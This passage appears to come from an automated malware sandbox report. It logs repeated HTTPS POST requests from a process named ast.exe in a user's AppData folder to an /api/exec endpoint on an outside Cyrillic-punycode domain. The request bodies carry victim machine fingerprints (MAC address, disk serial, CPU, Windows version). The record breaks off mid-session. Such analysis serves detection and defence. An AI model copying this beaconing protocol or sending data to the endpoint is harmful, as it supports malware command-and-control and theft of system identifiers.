                                                                                                                                2024-11-19 17:56:48 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                34192.168.2.450130212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:49 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:49 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                35192.168.2.450133212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:50 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:50 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                36192.168.2.450136212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:51 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:51 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                37192.168.2.450139212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:52 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:52 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                38192.168.2.450142212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:52 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:52 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                39192.168.2.450145212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:53 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:53 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                40192.168.2.450148212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:54 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:54 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                41192.168.2.450151212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:55 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:55 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                42192.168.2.450154212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:56 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:56 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                43192.168.2.450157212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:57 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:57 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                44192.168.2.450160212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:58 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:58 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                45192.168.2.450163212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:59 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:59 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                46192.168.2.450166212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:57:00 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:57:00 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                47192.168.2.450169212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:57:01 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:57:01 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                48192.168.2.450172212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:57:02 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
